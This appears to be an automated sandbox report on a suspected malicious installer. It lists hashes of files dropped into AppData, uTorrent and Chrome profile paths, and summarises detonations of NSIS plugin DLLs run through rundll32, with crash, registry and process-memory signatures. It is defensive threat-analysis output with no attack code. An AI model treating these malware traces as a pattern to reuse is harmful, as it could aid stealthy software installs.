SHA256 b0d2091c88b96f0fe304fb7f0b14e63e3ec8e6805088ead1e1d5a90b5d770447
SHA512 cce911c787b83ce019335ba31b803bf2533b6673d17e9915a5d90b0a528fb1c24d50cf06809b16020a241e63fc3cc76dc44c090cc87db299e9986399d4cea3e4

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 4ac494b9e5525afa7ed02cf423560d51
SHA1 dc6d45a1562241efb99e1b72a99ce9108128e3dd
SHA256 29d01cdfe48cce81ed1290f9c366b2d89a249e246fef0c581c394720918a0d5d
SHA512 eb8ac245e760a62066394772976abd745dd51d0f8b43378e920a64ac88957f8d1e06c61db00dd573e9748d022a808a5f64167cb773534e961cff4787a95d8780

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index

MD5 a3f171614147617fed912bceb9c32c0c
SHA1 4b040319e1113d48167316170c181887aa4ae03a
SHA256 fd1447c294994fa302e2f2796851e45f2797d55bce3d310f20f5f59d15298a3e
SHA512 1ff86ac7e1d6ea8549a22b02d651715c70e763ca35e40a8ab33c31c434f65d699f1707b97a44d2c40b48e6625c4adf99c662ce91b7f7722cdb9ba7180f46b509

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\TransportSecurity

MD5 f0c98073ff569110f031e3b605eddb39
SHA1 83156f5cf23b45dfd1a66956d05ae83257769027
SHA256 c58697997bdb0b877dd45bdf3d6c9e4d1c3af310618a9d951f49550a082006e1
SHA512 668848fb0a5489ab45723492642a2119138bc1cdad1a6f1530af6d099bb273bf03e3469873b8af708fc22041d02a429bd5406afbba416b82d8f3be0ada6d6a59

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 104e9ab74baa3327f074bf99ed37c7fd
SHA1 0dd64aec5b5dcdadb5245090ab65aada71836242
SHA256 8cf31256a2264dc9ee4ccc9d10df1f63ac31150dc43cb1b0b6ea53bea1cba972
SHA512 e9f86d41524619b9cab4b684972e05b991fa8f3693d40e51f65a73ce170c5b3979492a482dc75bd0951c8dc03708bc962ffbb44eea66a4944af38d5a8e4cbc1b

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 8b44fef30476d4896664605e410f3a93
SHA1 881ea735e30499b691a24d8b679ef49a911d57c3
SHA256 fc289d38926d41b2b548ee2d1079a1136c57692c202e7e77ebed9099d634018a
SHA512 c2d79fba5db94ece1a5b5c5afa4b9efae3d4829079b5790142d69a67da24c2ad64ae14e6fe4c71b0e34329459318ba76cd49d633f9c532bb61fb686df4bb7055

C:\Users\Admin\AppData\Roaming\Snetchball\images\1.jpg

MD5 129b90cc906f749e8a5a1684071d64d8
SHA1 e4e82bb1543b9777df7cf557de2df05a10d78f69
SHA256 1895cc90d07f0ea8aab4c91a47a546df02eb4ffecddfe37e73ce1af756fc9c47
SHA512 59c3642aaa5919a281f28a393d67e465d98cdd1061a0be305c4da715fd0c34e4813ae26b697a0783cc61177adcffd4f399d062cec4973ec24abbba4ac11cb6b5

C:\Users\Admin\AppData\Roaming\Snetchball\images\2.jpg

MD5 100c0f8e22bdb14b6121708de5c54aef
SHA1 fd2f5413e1c67e9200b6e34f8c588164aecabb89
SHA256 4657efc07f6e9f5f8a6b2138e49ef02465f3c787ec68744c902bae548f3c2c8f
SHA512 d89543ab12aba6e074f315afb5a96222af591875c678e89e1ca5d8984230a0f8fb86302c6b08553dc949bbab1dcd381ed185a4e1e533a3ada834cca8f24411ab

C:\Users\Admin\AppData\Roaming\Snetchball\images\3.jpg

MD5 54feea87f970074d9b564ed59a68abad
SHA1 7d288be99bbd1c655b9df3de8c0d94468baa65c0
SHA256 5b69f611d410240519d9b3d9b079a0f6befc9d7a1b4b4ccea8cf29189a9336ed
SHA512 7c1e7beb2b2148876ea04773840de455b84cc34046756efb4c304153fcee5591dd187bef4ec02275bf6a3ca0ccf8cfc636ca8042503c49177a73b5c923a646c4

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index

MD5 8a12c93e8c700e17b8d5c8d606853492
SHA1 7c1f517ae56d8ff1f04564036b22fc9fb004c45a
SHA256 204da1cb469083c12a88ffe3a057d76c76538cd083416d8de1ed8c65679135b7
SHA512 cb7a04a626696e19e42de6a336fa8b8136698237f73a28c51a9b0e7e121fdfbdc1ad2d5a533b49e21022bec0b11210813db4e58a6948393d6ef8556042415e39

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 506fa0c2e22c8aabbeabc7bac4836167
SHA1 d3b72fe895a1a77d53108fb28b8d7e7c6c5abbf3
SHA256 a9b9713e13e6e7cbec64fa60ab12b31e775b26681b0f0d85b7e667dadb456758
SHA512 a0906f262b5fb362a949fab6630a2fdd245b109f112683db9528241b9bd4dfee93d8510d5932f7cb685ac32ceeb91daeadf7aec5586f64446470cd9b91ff8a57

C:\Users\Admin\AppData\Roaming\Snetchball\results\1_info_0.txt

MD5 219ab43ee2780a5606a343bc33fbc00f
SHA1 ea756707b518679bf778ad32a4f49a58c95773f0
SHA256 2a50d0379509734dd325e48767abc05454d754581a4465866d5965f06827cc05
SHA512 2dc4d8b268e1ead6ca9ee9d0b11d3c1cd82ba9197774e87aac518b51f1b8e4c4b2900a237b40feb5e31d2cb6842eef5c9a7c148d1126998220e56c16c42b4fc5

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index

MD5 9030924da5c745e8fea28854d5e3174d
SHA1 718e8ca05e5d8b9b8cd056670ece14b662426b03
SHA256 5dd38be7d4ce7f21e9e6b479aa21d217d662a11f8453e2f697f53108c7e0edb2
SHA512 58a310c349222878d9a40f2d738ac4d5d3532615386e03ef71252afd539a3f3532cdd232e9a84ace248c56c20fcdbe01297aa92b6ccdcfe55af43cf29b04623c

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 2f5cb85548e90c504ff0194b6cadc34d
SHA1 599372bfd59db58638cb8b7907a4ac8d6bcc097f
SHA256 1aed2b58f6e5a61e0a4ae2c79037d462bcf1630dc06d08d2d7efae608dd4c37a
SHA512 fc93cef61e3523899531aea50cb8991df13d6fe66d3822d366ef9ba6fedfe3e4459a623c48936d652bd1b9830bee6aa7772b2cac009ddb9f4ec05007b4d6ae4d

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 917a286378fdbe9d5c71a77837b6479f
SHA1 0ac7b62db98b79881c17e1dca9e23c312a7a8371
SHA256 9a098642b9af0f45630b8d36cc428bc56d52f3365169d325bf3a61cfe9526217
SHA512 20c7006208b0875d954d7d5e451d2174547b459dee6aaddfe2af83cdb93d91579b5dc2b37aa8be6a364ccb4b77db5e603ebc087e82e1d681aa1b5e9a26f5db58

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\TransportSecurity

MD5 a1d28bb360f4676bf337c9a91fe2d42a
SHA1 7eab7e696dceba53eb362353cdc52cb0b97ea442
SHA256 15f7b5774db3f44960de73a922626415eefdcb7d811104946219efc77da6e9bd
SHA512 e954f99549a2cc04fcc08b5ddd12804f2caf741f415fadeafe64771bcedf2a437ae51c76f403f23e8ad9a0a164fed311d18661cdb9feccd666404bd2928577ca

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Network Persistent State

MD5 71c511c10844db2e7abbd456b3645cb4
SHA1 57a087c8ee07c00f7fd67f622d596fd83549a1d5
SHA256 63192a4035d848897e07c20e9efafd18d680c10dc3d5480b09cc879e68d45e5d
SHA512 e3ee700871081699c44479324b1feec95736e50ee5f74963572b218fcff5591bbb06c12044fd2a0b13a9d4ce3be7762069cdec2496dd1811cf185e998711355e

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index

MD5 7948b3bfa665c931a6dcff5d60ae0284
SHA1 8354a73fcfe4f3c20eb766dc313b6cb97fe5c1ca
SHA256 bd1a6bb34afaa1e32a0976918f49ce975817e41cd3efcf941ea29fb0a54a5a21
SHA512 ab30c3cf52915e36ed7fc77712acd92b6e06cd775714b1f68c2cfc9d541dfb3320b87e11beeb7a382675ee034b8e46a56eea7df39642603c1cd129d7c5e92992

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Local State

MD5 cd7e894b0faa7e643d710351e564ddd1
SHA1 086702051c8b7948e98d556ba7210737600d672c
SHA256 d153530d0f7d05d3bcc29067b0fea2fda401ef01253403d30d1796a373bd1f94
SHA512 68386751dd3f85db705a2062b07a3b83ce251c77eb54d93fac0202e1a60c6f6151ec672e8d5f939aef0057b1f1390d694f3ddaa5a7a96fd1b195b44ab723b9b0

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Preferences

MD5 91dec3d260cbf4f8fab4c3115969e8fb
SHA1 5d8e1f5ce3287aaaaf9f5974f81029eb5c19be96
SHA256 af1f58a05a2ee065732f244a1685a8ca2a6bd2220155943e31c986e293e4ab2e
SHA512 3f7be6f86c744899dc3e3fe9c9709ece586d18af9afa2eed9d23b4ef85d95ad6461be7cd2616cb3462c991b2650a5840539b3f927d9417380d6565118a8815a1

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 046f7121434b586f3f1d2b1d8c8384d6
SHA1 17b5a08ac4c9e1e82423e445da645866199877af
SHA256 791511e409e80fad609d0ade963a29a4779d64f6b8207b325c65e9ad4ca332ce
SHA512 a6253bc5ecd900dced3e43d1e333df0eab07cf5a2baa43992a2f3fe8e336ac2dce0c41eeafc5daabd495e0c8ec1c4276a885b3e860caf33c25d4ec412b8ad268

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 269225983ae322ac3fccf0c9a73bf42b
SHA1 f50796253f0a1f4e10b9519bce87f4ed4a3af8c6
SHA256 49c704ccfc2f4d15fa7cc9ea31be4cd362b3b65c7f1e858118197668b142126d
SHA512 a4a5ab388372d54d9906c8dd25e60cf1163960c8680a9c80d801078f404c0313d9a8dd5b252fd88a2882a03545573791a83a8358a2be38820295852d27ad5c34

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index

MD5 f2f64f8047e852f51ed52e1e7cf5be45
SHA1 8ac4cab72d348dff1fd312fe14fbb8c4b4eb9df5
SHA256 79e6d9f9f35f59fa8ee83e5894afa585ac207c1eeb17c9a20597d904bd840fe9
SHA512 d9de23c88ee10d7f715c3a3c278379a2c7db1b55b3fb22ed3fb3e29e0d6ec904f3450157a5440660acd019033185e40040ab91bd0335138a8739eddfa25b4bd6

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5748_413205021\manifest.json

MD5 3bc960cfeaf829a56df1c4cf358d4de0
SHA1 0a04642aba38d4505194e13fbbc7d07d62aa9dd7
SHA256 5a0ad282948bb4ffc4d9f999b1be91416396240876c2292abb4004cd44eed1ce
SHA512 3cc8265ffc0176b8e11b7b207640af74081c852007aa0befef465429cd1befb9b9ea3b53d15d4d24a4b061b50216bdf63af7dcc471daf2056fbc9ded02aec61a

C:\Users\Admin\AppData\Local\CEF\User Data\WidevineCdm\4.10.2830.0\LICENSE

MD5 f6719687bed7403612eaed0b191eb4a9
SHA1 dd03919750e45507743bd089a659e8efcefa7af1
SHA256 afb514e4269594234b32c873ba2cd3cc8892e836861137b531a40a1232820c59
SHA512 dd14a7eae05d90f35a055a5098d09cd2233d784f6ac228b5927925241689bff828e573b7a90a5196bfdd7aaeecf00f5c94486ad9e3910cfb07475fcfbb7f0d56

C:\Users\Admin\AppData\Local\CEF\User Data\LocalPrefs.json

MD5 7640d75722eac88252e59da7e78e9809
SHA1 9ad92d6bbb63630c839e103e4749dbfe3a4c4724
SHA256 880d12161b536bfe14e942d1bce43884dc57bc875999c798dbd3277419f55269
SHA512 bd8482be05a8d94054bcccda04ce5c9fa2505e8abc764536ae03d4ff7b2666f3be55f2dc2ef8f0f08b6d84b9095f8e90b97e82ec5d8a8ba8af1babf5ad651f6a

F:\Games\The Longing\The Longing_Data\level10.resS

MD5 717c6d424b85a31a68caeabf1ff58aac
SHA1 28ce889eda9a20f3a6d8206bf365b6f33494325c
SHA256 ff788b7781a6d40f99d9d0dfd688dbf5dca187691beb6f5adedf88708e336e7f
SHA512 55e415cd3755069e19966762f028f5ec735c26232c2e1ec424e17c3b9042bde1cd43bf304ac34ce5d5f7c666c72f543f97a6fcf92ee35f39fcb055b0dd2257a3

F:\Games\The Longing\The Longing_Data\sharedassets10.assets.resS

MD5 c33a7c640e9458ad4bd4755d5a984e9e
SHA1 05c513dd0e066c2ee4d1b8ebe4a937109abc636b
SHA256 baf57d94373570530be6436640a8d94b7d83f924eb434d1c7ec3d13f991c83ff
SHA512 b8e328c5072d4159d92c1f279986c9a07efc18c30f95bb79f1549ee8806164abb68a5a36699a2ea9beb974de11e584bc22873de5c5e4cd014a2c5e8947301366

F:\Games\The Longing\The Longing_Data\sharedassets6.assets.resS

MD5 bbc8a3dbd8f350526ebd98d7d1a82554
SHA1 3c56ac2c53823646abad240355c2573863f2fa5f
SHA256 e255bf1a4a6e5c873a0e7a6be4fbf3bcb60a605ce377e40f0d3466477b23e347
SHA512 1edde2853664c8f0d458eb27f57b09a51e8a4858db2c04a8656b6b8b1ee7998bfa3eac447e0be9ccfaf8642c4455723b75975968b6e53df681301ebcf8ac819e

F:\Games\The Longing\The Longing.exe

MD5 a294ab7a1968d5d62e899b91e457a941
SHA1 f6ad540ee8a308808e5750454a5a714341a7306a
SHA256 eee2703c14decda7a4a79104935db6c908cf361837a3244e03b7d00c8c887b14
SHA512 dd28a8fc0b8b8470473fe3f2da8d2997c59998ed0ac73f96e0cd3bb3474463c7e5ca034209489d4e280c82cceb7fce69962815069c35a89cf751dc0d1753bf20

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\TransportSecurity

MD5 aef58b997e798bbe4d6c319bc669dfcd
SHA1 ccab47b75316a7ed49ad404867ede6882ee91ea1
SHA256 9d76ec115140ae617062d5e7e527b1fb7a38d1d24265ee5547fa82a4b0879dc2
SHA512 45ad0f1c52ce73e220a845f70e0e21cb9cb7e4a4186068948d57f74b05d7f3e216be671c6bdb60e73966d938c009df5c4c6b56374af35ad5e7b4933d4260d27b

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Network Persistent State

MD5 779efa7324b149e8ea609ddbfa59e97c
SHA1 058ce1f98baecbc2bf5fd3f4e145cf33440a1dad
SHA256 1b9193a77a87299400ced876db4b402d2868567d07353240a0fec43319334a48
SHA512 c9a4b37f0da92f978c46d104f0ad49e8c3183fd55212b63f57679ede77d9b2b692e1e58fc6120002fbbac403cc4e4d02d9c926baa97559109506bb5127da6b3f

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index

MD5 ef7286289b65b75eec42f536c13911dc
SHA1 887bb080ce134be21a6ae19fa84bf5d0ff4dda3a
SHA256 2bce140ee18a901fb8cfae1e9ddea5382b347c1ce299de0d79059af1b3d738f0
SHA512 b10b68dc6e6e6aa9ce8da6337c97130a21c09074a54701713109a71372d139809559b27d5ef0509080407a45e9aebd199ca41adaa3cfaafca3bd0196ba7833ad

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index

MD5 0ef9a6d3297411fd02d96aec83b45a78
SHA1 78a966fafca14e5d484a95c09f8d1d6bd14a5ebb
SHA256 1b432d0cdb8a0bc8283927f9824f2f8fa2a1c607c1569461ee9e7c5b7e123be4
SHA512 5945d08ac678866123a5919ad5a35b80bb3c0c911cf6a3d2e1104df56de9f7a41bdb8b58a5eae9c473102dc7efcd486927a12820fb6ea003c59016b6eb54bcd1

C:\Users\Admin\AppData\Local\D3DSCache\e067532ca9807a39\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

MD5 f49655f856acb8884cc0ace29216f511
SHA1 cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\scoped_dir6244_557721920\9ae68f57-e52b-46d8-a6a8-53a93f537dda.tmp

MD5 da75bb05d10acc967eecaac040d3d733
SHA1 95c08e067df713af8992db113f7e9aec84f17181
SHA256 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2
SHA512 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef

C:\Users\Admin\AppData\Local\Temp\scoped_dir6244_557721920\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 288b1f568920cc645f4a321e362bfad8
SHA1 03e1b2b14725393b97341fa63982f882650deac5
SHA256 64657ec88a32b6167f9bee37fadd8dcfefd5e75d9191adf31c63453db769bcc2
SHA512 b521fdba738bf5cf1cb087a765697fb909489292929c85024329d575df1b9571f9c4065bfff2ee94f2cb92e7c8aac58552f670c8010b6c3a604c9f29c9e81e9a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 ef9b8417923f7c6387ac6b9d9d0cca2e
SHA1 fe2c01767a3f5b338d9aff198e7c18089bb4a28a
SHA256 5b6f0036e9229371f48e816eeb8c018d43bd020f53836f6026db95355ebad202
SHA512 91eb5f7b41e7395e274cfea1e00b8177570edd7c5751b36ed4717b9027dd2a5d6a93c30966cbb08cf076500e43e59002f3cb412cd4eb562003bf9f2484d0f695

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d579e459a5d9dfc0c080b87b1b00ecec
SHA1 360814f7b6ea088fbaa81d307efbc281ecfadbd2
SHA256 f965c262ffedaf003a70317de8134d7f7caac66b38bdfcd9943b7a9e54f305fe
SHA512 896c6ff7282500abbde3c26bd6c078aca945fa9eb941065971e191136786f3fc5fe65a99f6521226eace514a661df33ed074cfe57fb9267793d9b56ded87e6d3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 675473985c861d7a735106d105a5c762
SHA1 98d3b0a8ab879201445027d27f86758cd9710327
SHA256 bfa4cdbb93efce70a489adfb9c8610947ccf7c18e294851e23f1154c4cbb8477
SHA512 a25b12ba440954f08474d3e23a8edd5467ac814453866a4b065d0ee9a18d63352ea9cdcbeb4d8b77d457cceed97d2cda85e204d0f6f43f7257ea20cdffa2fba4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00005e

MD5 1b54b70beef8eb240db31718e8f7eb5d
SHA1 da5995070737ec655824c92622333c489eb6bce4
SHA256 7d3654531c32d941b8cae81c4137fc542172bfa9635f169cb392f245a0a12bcb
SHA512 fda935694d0652dab3f1017faaf95781a300b420739e0f9d46b53ce07d592a4cfa536524989e2fc9f83602d315259817638a89c4e27da709aada5d1360b717eb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 d6b66962e9c50f33149bc9139ecd915f
SHA1 bebb45a386abd3f69ba48101eebea63bb2615afa
SHA256 3a1697c5521eee300223bba7313ecba1e3c07d79992fa92b44deaef56ad4622c
SHA512 b04f32b6eda0c7c4e80edadf566edb24546e9eb4adcf13a0174f303e15992a0602d9462d2c2f6f7735d705e6667bb4f16c497b6de21eaefb72f4d8f77980601a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f6a20e0a3f18b39b50ee96e8ac762abc
SHA1 ca8c5b8d8b1d5010f1949d6235b8d928a67fca39
SHA256 0cb7b9fe88b0fd8533dfd133d26337e71875f4d232e4bcc1d732c1b32092663e
SHA512 3f98c5356b2233ca229925888c97946183951ebdb22bda93ef977c96ca7123031c7a4eefbd4fbf1aa121dee10164e516840a7538917a97af49fd4752d0553e74

C:\Users\Admin\AppData\Local\Temp\nsy549C.tmp\nsDialogs.dll

MD5 4e5bc4458afa770636f2806ee0a1e999
SHA1 76dcc64af867526f776ab9225e7f4fe076487765
SHA256 91a484dc79be64dd11bf5acb62c893e57505fcd8809483aa92b04f10d81f9de0
SHA512 b6f529073a943bddbcb30a57d62216c78fcc9a09424b51ac0824ebfb9cac6cae4211bda26522d6923bd228f244ed8c41656c38284c71867f65d425727dd70162

C:\Users\Admin\AppData\Local\Temp\nsy549C.tmp\nsProcess.dll

MD5 08072dc900ca0626e8c079b2c5bcfcf3
SHA1 35f2bfa0b1b2a65b9475fb91af31f7b02aee4e37
SHA256 bb6ce83ddaad4f530a66a1048fac868dfc3b86f5e7b8e240d84d1633e385aee8
SHA512 8981da7f225eb78c414e9fb3c63af0c4daae4a78b4f3033df11cce43c3a22fdbf3853425fe3024f68c73d57ffb128cba4d0db63eda1402212d1c7e0ac022353c

C:\Program Files (x86)\Steam\Steam.exe

MD5 33bcb1c8975a4063a134a72803e0ca16
SHA1 ed7a4e6e66511bb8b3e32cbfb5557ebcb4082b65
SHA256 12222b0908eb69581985f7e04aa6240e928fb08aa5a3ec36acae3440633c9eb1
SHA512 13f3a7d6215bb4837ea0a1a9c5ba06a985e0c80979c25cfb526a390d71a15d1737c0290a899f4705c2749982c9f6c9007c1751fef1a97b12db529b2f33c97b49

C:\Users\Admin\AppData\Local\Temp\nsy549C.tmp\nsExec.dll

MD5 2095af18c696968208315d4328a2b7fe
SHA1 b1b0e70c03724b2941e92c5098cc1fc0f2b51568
SHA256 3e2399ae5ce16dd69f7e2c71d928cf54a1024afced8155f1fd663a3e123d9226
SHA512 60105dfb1cd60b4048bd7b367969f36ed6bd29f92488ba8cfa862e31942fd529cbc58e8b0c738d91d8bef07c5902ce334e36c66eae1bfe104b44a159b5615ae5

C:\Users\Admin\AppData\Local\Temp\nsy549C.tmp\modern-wizard.bmp

MD5 3614a4be6b610f1daf6c801574f161fe
SHA1 6edee98c0084a94caa1fe0124b4c19f42b4e7de6
SHA256 16e0edc9f47e6e95a9bcad15adbdc46be774fbcd045dd526fc16fc38fdc8d49b
SHA512 06e0eff28dfd9a428b31147b242f989ce3e92474a3f391ba62ac8d0d05f1a48f4cf82fd27171658acbd667eaffb94cb4e1baf17040dc3b6e8b27f39b843ca281

C:\Users\Admin\AppData\Local\Temp\nsy549C.tmp\System.dll

MD5 a36fbe922ffac9cd85a845d7a813f391
SHA1 f656a613a723cc1b449034d73551b4fcdf0dcf1a
SHA256 fa367ae36bfbe7c989c24c7abbb13482fc20bc35e7812dc377aa1c281ee14cc0
SHA512 1d1b95a285536ddc2a89a9b3be4bb5151b1d4c018ea8e521de838498f62e8f29bb7b3b0250df73e327e8e65e2c80b4a2d9a781276bf2a51d10e7099bacb2e50b

C:\Users\Admin\AppData\Local\Temp\nsy549C.tmp\StdUtils.dll

MD5 db11ab4828b429a987e7682e495c1810
SHA1 29c2c2069c4975c90789dc6d3677b4b650196561
SHA256 c602c44a4d4088dbf5a659f36ba1c3a9d81f8367577de0cb940c0b8afee5c376
SHA512 460d1ccfc0d7180eae4e6f1a326d175fec78a7d6014447a9a79b6df501fa05cd4bd90f8f7a85b7b6a4610e2fa7059e30ae6e17bc828d370e5750de9b40b9ae88

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 fd0f91946d25cbc1feb54dbf3801a17f
SHA1 9ada02d04e9fbd41a0d5a6f516fda6ed3731f6cc
SHA256 578309e7a4dbd6f2a3fefbcc64ac6d9486b3332bd723ca7c405f695dfe4835aa
SHA512 ab364d5b08231e3b6f00b5e754cd0115a5a4a9a3d0a71d12229855dd656f2693ff949ac3996399e4449fa1afda4f1f35ec2198aebfeb3e3e7924c8cf0d4d6758

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 38bdcadd2fd29e1587172b3e35947b1c
SHA1 3a79d58acc7fe4617672b3db061a1d6701ae2d0c
SHA256 2a5a4695d1ee967f86490b22fb0d515b8c609c17915934fb958491dee449edc6
SHA512 97bfea65b56f02803b5f241960d9a4116ef9c82fabf98a6fa1a76f1abc5692e3d6c2e1e3d9cb6fc1a4f6345088b6da87007c264b8c5df6fc1fb1327b11815ca8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 47f5306d288a583fb62d9f7601d97c27
SHA1 b05a63fc2ef61fbaec13e61c9f8f4b135bd9c1ef
SHA256 0b6212060b72d7d3b50d4f49ff78785aa23a79164120e820a7821f67a4d1cfef
SHA512 c1b9522186f8f574e28596b3a6c8d348ffd5a2ef38c56ae81667a2259f3e6840421b26c9846f90ce8d484260ed70cd5649363c1cea0caabe8cf6058dfbd27b22

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 8751145962fda5fa06e95fa462896587
SHA1 4f19a6b9188d29f430836a0639790da84fa0bfaf
SHA256 9380f7f59cd92b176013e7b3eeab5253d7d8d03bd302892fff3f0c22d2c3b0a0
SHA512 6681cae3043e7e5b402e2fb811b1664f47aa82a27a13e1d42e23f682854ca68c17455dbf117d815ac82ea9848f87dc0c39705257fccc2753c87a7347acf4863a

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 03:49

Platform

win11-20241007-en

Max time kernel

91s

Max time network

94s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3552 wrote to memory of 1952 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3552 wrote to memory of 1952 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3552 wrote to memory of 1952 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 1952 -ip 1952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 488

Network

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 03:50

Platform

win11-20241023-en

Max time kernel

146s

Max time network

152s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
